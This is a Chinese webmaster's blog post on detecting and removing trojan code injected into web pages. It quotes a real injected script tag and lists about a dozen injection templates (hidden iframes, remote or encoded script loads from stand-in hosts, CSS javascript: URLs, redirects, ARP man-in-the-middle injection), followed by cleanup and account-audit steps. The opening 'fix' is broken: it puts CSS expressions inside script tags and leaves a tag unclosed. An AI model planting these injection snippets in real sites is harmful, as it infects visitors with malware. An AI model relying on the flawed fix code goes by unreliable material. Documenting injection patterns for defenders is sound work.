如果网站被挂马,又找不到被挂马的网页吗可以在网页中插入以下代码
<script>
iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}</script>
原理:将<script>标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,如果是,则页面内容清空并写出“木马被成功隔离!”。反之正常显示。
缺点:访客无法看到被感染了<script>木马的页面。
解决方案2:
<script>
iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}
<script>
原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了。
这几天,vich在写一个程序,意外中发现vich的排名下降了很多,流量也很少!分析了下HTML代码,在</html>后多了一句“<script src=http://ntrjj.cn></script>”的代码!一直是以为用的是免费空间的原因,在咨询空间的负责人后发现并不是那样 -_-! 网站被挂马了,今天从ftp里找到了所有的“<script src=http://ntrjj.cn></script>”,并删除掉,可原因并没有找到,在这里vich搜集了点儿几种清除网页木马的方法,希望能帮助有如同我一样遭遇的网友-----
一、首先要确认是什么网页木马,可以从杀毒软件中获得信息,通过他的症状判断是哪一种类型的木马。
二、通常网页木马的代码都是是这样的,我提供一些资料希望对大家有帮助,以便查看网马的代码是哪段
1:框架挂马
<iframe src=地址 width=0 height=0></iframe>
2:js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
3:js变形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀
4:body挂马
<body onload="window.location='地址';"></body>
5:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n
<iframe http://www.xxx.com/muma.htm/">'">http://www.xxx.com/muma.htm/"></iframe>';
6:css中挂马
body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}
7:JAJA挂马
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,
menubar=no,scro llbars=no,width=1,height=1");
</script>
8:图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
9:伪装调用:
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
10:高级欺骗
<a href=http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)
onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,
menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
11: 超级网马—通过arp欺骗来直接挂马
原理:arp中间人攻击,实际上相当于做了一次代理。
正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
arp中间人攻击时候: A---->C---->B
B---->C---->A
实际上,C在这里做了一次代理的作用
那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如 <iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了。)
以上是比较历害的网页木马代码
三、 种了木马如何处理呢?
1、找到嵌入的网页木马文件。以下,拿自己的经历说事。找到的文件是wm.htm
2、在注册表中查找wm.htm。很幸运,找到了。开始顺藤摸瓜...
3、修改键值wm.htm为wm_nnd.htm。
4、再次查找wm.htm。很不幸,又查到了。说明有服务程序在作怪。嘿嘿,有意外发现。cain.exe,据说是密码嗅探器。
5、修改键值cain.exe为cain_nnd.exe。
6、查找cain.exe,仍然可以查到。嘻嘻,在预料之中。
7、怀疑wm.htm与cain.exe同流合污,背后有服务程序作后台。
8、快查查看,系统服务程序。在运行->msconfig 或直接在命令行使用net start,查看可疑程序
9、发现temp*.exe(全名记不清了),立马net stop server 。
10、快去修改键值wm.htm为wm_nnd.htm,cain.exe为cain_nnd.exe。
11、再次查找wm.htm或cain.exe,没有找到。哈哈,很好。
12、观察了几天,没再发生挂马的现象。
四、通过检测网络连接查看服务器是否中了木马或病毒
1、使用netstat -an 查看所有和本地计算机建立连接的IP。
2、连接包含四个部分——proto(连接方式)、local address(本地连接地址)、foreign address(和本地建立连接的地址)、state(当前端口状态)。 通过这个命令的详细信息,可以完全监控计算机上的连接,从而达到控制计算机的目的。
3、手工制作bat程序,生成网络连接日志文件供站长分析:bat文件代码如下
REM 注释:监控的时间
time /t>>Netstat.log
REM 每隔30秒,把服务器上通过tcp协议通讯的IP和端口写入日志文件
Netstat -n -p tcp 30>>Netstat.log
注意:要谨慎使用,这会给服务器带来性能影响。最好,在服务器发生异常,怀疑中木马或病毒时,用来分析网络连接日志。
仅仅这些还不够,说说更严重的:
1、可恶的攻击者喜欢使用克隆账号的方法来控制你的计算机。“它们”激活一个系统中的默认账户,但这个账户是不经常用的, 然后使用工具把这个账户提升到管理员权限,从表面上看来这个账户还是和原来一样,但是这个克隆的账户却是系统中最大的安全隐患。
2、赶快检测系统帐户:
a、在命令行下输入net user,查看计算机上有些什么用户。
b、使用“net user 用户名”查看这个用户属于什么权限的及登录时间等。
c、一般除了Administrator是administrators组的,如果你发现一个系统内置的用户是属于administrators组的,那么别人在你的计算机上克隆账户的概率为90%。
d、是使用“net user 用户名 /del” 来删掉这个用户,还是修改其它配置,这你说了算。
分享到:
相关推荐
标题中的“强制删除文件木马病毒”指的是采取特殊的技术手段来对抗这类难以根除的恶意软件。下面将详细解释相关知识点。 1. **木马病毒**:木马(Trojan)是一种伪装成正常程序的恶意软件,用户在不知情的情况下...
根据给定文件的信息,本文将详细介绍几种常见的木马手动删除方法。这些方法主要涉及通过注册表编辑器(Regedit)和命令行界面(MSDOS方式)来查找并删除恶意程序,确保系统的安全。 ### 1. 基础概念 在开始之前,...
文件暴力删除 顽固文件删除 木马删除 没啥这软件删不掉
### 如何删除木马病毒 1. **禁用系统还原**(Windows Me/XP):避免木马病毒在系统还原后再次激活。 2. **将计算机重启到安全模式或 VGA 模式**:在这种模式下更容易发现和清除木马。 3. **木马病毒最爱藏身的几个...
网站安全是互联网时代不可忽视的重要议题,尤其是对于网站管理员来说,面对木马和恶意代码的威胁,必须有相应的防范和应对措施。"网站木马批量清除工具"正是为解决这一问题而设计的实用软件,它能够帮助用户快速定位...
根据提供的文件信息,我们可以归纳出一系列有关特定木马的手动删除方法。这些方法涉及通过注册表编辑器(Regedit)及系统配置文件的修改来清除木马。下面将逐一介绍几种具体的木马及其对应的清除步骤。 ### 1. ...
标题中的“防删除木马.rar”表明这是一个关于防范和处理电脑病毒,特别是“删除木马”的主题。这类木马通常会自我隐藏并试图删除或阻止用户删除它们,从而对用户的系统安全构成威胁。描述中的“超有用的”提示了这份...
网页木马删除软件-ClsMuMa是一款专门针对网页木马设计的安全工具,旨在帮助用户快速检测并清除系统中的恶意代码,保障网络安全和个人信息安全。在互联网环境中,网页木马是一种常见的威胁,它们通常隐藏在正常网页中...
在IE中运行,列如在根目录,那么在IE中输入 http://域名/批量清马工具 用后删除web.asp。 点 查找木马,再点 开始扫描。 如何查找木马? 使用本站提供的清马工具,点查找木马----再点开始扫描.等待一段时间扫描完了,...
下面将详细介绍木马的基本概念,以及如何批量删除木马代码的方法。 首先,我们来了解什么是“木马”。木马(Trojan)是一种恶意软件,其名称来源于古希腊传说中的特洛伊木马,寓意这种程序表面上看起来无害,但实际...
该工具,下载后直接解压就可...无毒无插件,会编程的朋友可以继续修改,以增加其性能。本人一直以来使用着,操作非常方便,直接快速。对大型的网站数据库批量查找木马代码是很有帮助的。特此传于csdn和大家一起共享。
2. **网站挂马**:在网络服务器上植入木马程序,当用户访问这些网站时,木马自动下载到用户的计算机上。 3. **电子邮件**:通过电子邮件附件传播木马,诱使用户打开带有木马的附件。 4. **即时通讯工具(如QQ)**:...
3. **远程访问型木马**:这是目前最为常见的一种木马类型,能够远程访问受害者的计算机硬盘,允许攻击者执行任意操作,如查看、修改或删除文件。这类木马往往通过特定端口建立连接,并可能设置复杂的认证机制以增加...
标题中的“暴力木马,病毒删除工具”指的是专门用于消除计算机系统中顽固或恶意的木马病毒的软件。这类工具通常拥有强大的扫描和清除功能,可以针对那些常规杀毒软件难以清除的威胁进行深度清理。 描述中的“只管...
当删除文件时遇到“文件正在被其他进程使用中,无法删除!”等情况时,这个工具能够让你轻松删除这类文件。可以用来彻底删除顽固木马
系统提供了全站扫描、按文件夹和指定文件扫描三种扫描方式,如果网站文件比较少的话,推荐使用"全站扫描",如果文件比较多,推荐 使用按文件夹扫描。扫描过程,系统会记录被扫描过的文件列表,同时对怀疑是木马程序...
服务器上javascript木马,iframe木马清理工具,用后删除
4. **安全隔离**:对于疑似感染的文件,工具会将其隔离,避免直接删除可能导致的系统不稳定。 5. **修复系统**:清理木马后,软件可能还包含系统修复功能,恢复被篡改的设置,确保系统运行正常。 6. **定期更新**...
对于无法完全分离的部分,可能会选择直接删除或阻止其执行。 三、"木马分离.exe"的应用 "木马分离.exe"是一款专门用于木马分离的工具,它集成了上述的分析和分离技术。用户只需运行该程序,指定可能含有木马的文件...
我自己网站一直在用的网站木马专杀工具 www.bfaft.net 【V3.0 新增功能】 1、再次优化内核算法,比2.X版本查杀效率提高50%以上,节省您的时间; 2、增加对组合木马的查杀,如在图片文件中镶嵌一句话木马等。 ----...